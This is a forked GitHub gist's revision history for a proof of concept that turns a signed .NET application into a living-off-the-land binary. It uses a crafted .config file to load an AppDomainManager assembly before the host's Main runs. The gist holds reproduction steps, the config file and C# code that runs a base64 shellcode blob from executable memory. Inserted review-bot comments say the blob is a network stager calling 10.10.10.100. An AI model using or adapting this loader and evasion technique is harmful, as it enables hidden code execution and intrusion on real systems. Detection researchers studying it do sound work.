

@aaaddress1
Forked from djhohnstein/_notes.md
Created September 12, 2024 14:47

Revisions

  1. Casey Smith revised this gist Mar 12, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion _notes.md
    @@ -4,7 +4,7 @@ We can do this by experimenting with .config files.

    Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

    In this example, we don't have to rename anything. We simple coerce a trusted signed app to laod our Assembly.
    In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

    We do this by directing the application to read a config file we provide.

  2. Casey Smith revised this gist Mar 12, 2020. 1 changed file with 3 additions and 2 deletions.
    5 changes: 3 additions & 2 deletions test.cs
    @@ -11,7 +11,8 @@ public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!");
    // You have more control here than I am demonstrating. For example, you can set ApplicationBase,
    // Or you can Override the Assembly Resolver, etc...
    bool res = ClassExample.Execute();
    // If you want, execute shellcode or whatever.
    //bool res = ClassExample.Execute();

    return;
    }
    @@ -41,7 +42,7 @@ UInt32 dwMilliseconds
    );
    public static bool Execute()
    {

    // Its calc, I think ;-)
    byte[] installercode = System.Convert.FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxMC4xMC4xMC4xMDAAWkiJwUnHwPsgAABNMclTU2oDU0m6V4mfxgAAAAD/1ehHAAAAL3pqckU2QVh2TFh0cUUyc1JORUlLeXd0a3EtSGoyYjhRYVNSNTJCUlVNcjd6VHo2R0ZiX3Q2dTIyU1MyWGp3ZmlaY2RWYgBIicFTWkFYTTHJU0i4ADKghAAAAABQU1NJx8LrVS47/9VIicZqCl9IifFqH1pSaIAzAABJieBqBEFZSbp1Rp6GAAAAAP/VTTHAU1pIifFNMclNMclTU0nHwi0GGHv/1YXAdR9Ix8GIEwAASbpE8DXgAAAAAP/VSP/PdALrquhVAAAAU1lqQFpJidHB4hBJx8AAEAAASbpYpFPlAAAAAP/VSJNTU0iJ50iJ8UiJ2knHwAAgAABJiflJuhKWieIAAAAA/9VIg8QghcB0smaLB0gBw4XAddJYw1hqAFlJx8LwtaJW/9U=");

    IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40);
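Review bot: The comment added above the payload, `// Its calc, I think ;-)`, is contradicted by the blob it describes: base64-decoding the literal on the following line yields the strings `wininet`, `10.10.10.100` and a long URI path, which indicates a network stager that calls out to that address rather than a local calc launcher. A reader who takes the comment at face value will not expect outbound traffic from this sample, so the comment should state what the blob actually is and how it was produced, e.g. `// Network stager: contacts 10.10.10.100 over wininet; generated with <TOOL-PLACEHOLDER>`. The enclosing `Execute` body continues below the hunk.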
  3. Casey Smith revised this gist Mar 12, 2020. 3 changed files with 74 additions and 0 deletions.
    9 changes: 9 additions & 0 deletions _notes.md
    @@ -10,5 +10,14 @@ We do this by directing the application to read a config file we provide.

    See Poc Below.

    Steps to reproduce.
    ```
    1. Copy some binary you love to say, c:\Test. Lets use aspnet_compiler.exe as an example
    2. Compile the test.cs to test.dll and put it in C:\Test
    3. Rename app.config to aspnet_compiler.exe.config
    4. Execute aspnet_compiler.exe
    5. Profit :)
    ```

    Questions/Comments Welcome.

    9 changes: 9 additions & 0 deletions app.config
    @@ -0,0 +1,9 @@
    <configuration>
    <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
    <probing privatePath="C:\Test"/>
    </assemblyBinding>
    <appDomainManagerAssembly value="test, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="MyAppDomainManager" />
    </runtime>
    </configuration>
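Review bot: The two elements that do the work in this file, `appDomainManagerAssembly` and `appDomainManagerType`, carry no comment, and `probing privatePath="C:\Test"` is given as an absolute path although the runtime's probing rules treat `privatePath` as subdirectories relative to the application base; since the notes place test.dll in the same directory as the host, the element is probably redundant rather than harmful, worth confirming. A short comment on the `<runtime>` element would help anyone reading this as a detection sample: `<!-- appDomainManagerAssembly/Type make the host CLR load MyAppDomainManager from test.dll (PublicKeyToken=null, i.e. unsigned) before the host's Main runs; an <exe>.config carrying these two elements next to a signed binary is the artifact to monitor for -->`.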
    56 changes: 56 additions & 0 deletions test.cs
    @@ -0,0 +1,56 @@
    using System;
    using System.EnterpriseServices;
    using System.Runtime.InteropServices;


    public sealed class MyAppDomainManager : AppDomainManager
    {

    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
    System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!");
    // You have more control here than I am demonstrating. For example, you can set ApplicationBase,
    // Or you can Override the Assembly Resolver, etc...
    bool res = ClassExample.Execute();

    return;
    }
    }

    public class ClassExample
    {
    //private static UInt32 MEM_COMMIT = 0x1000;
    //private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    [DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(
    UInt32 lpThreadAttributes,
    UInt32 dwStackSize,
    IntPtr lpStartAddress,
    IntPtr param,
    UInt32 dwCreationFlags,
    ref UInt32 lpThreadId
    );
    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(
    IntPtr hHandle,
    UInt32 dwMilliseconds
    );
    public static bool Execute()
    {

    byte[] installercode = System.Convert.FromBase64String("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");

    IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40);
    Marshal.Copy(installercode, 0, (IntPtr)(funcAddr), installercode.Length);
    IntPtr hThread = IntPtr.Zero;
    UInt32 threadId = 0;
    IntPtr pinfo = IntPtr.Zero;
    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
    WaitForSingleObject(hThread, 0xFFFFFFFF);
    return true;
    }
    }
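Review bot: `Execute` passes the magic numbers `0x1000` and `0x40` to `VirtualAlloc` while the constants that name them, `MEM_COMMIT` and `PAGE_EXECUTE_READWRITE`, sit commented out at the top of `ClassExample`; restoring those two declarations and using them in the call would make the RWX allocation self-documenting. The file also carries an unused `using System.EnterpriseServices;` directive and an unused `res` local in `InitializeNewDomain`. A header comment on `ClassExample` stating its observable behaviour would help readers auditing this as a sample, e.g. `// Invoked from InitializeNewDomain, i.e. inside the signed host before its Main: allocates RWX memory, copies the embedded blob into it, starts a thread on it and blocks in WaitForSingleObject.`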
  4. Casey Smith created this gist Mar 12, 2020.
    14 changes: 14 additions & 0 deletions _notes.md
    @@ -0,0 +1,14 @@
    ### Let's turn Any .NET Application into an LOL Bin

    We can do this by experimenting with .config files.

    Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

    In this example, we don't have to rename anything. We simple coerce a trusted signed app to laod our Assembly.

    We do this by directing the application to read a config file we provide.

    See Poc Below.

    Questions/Comments Welcome.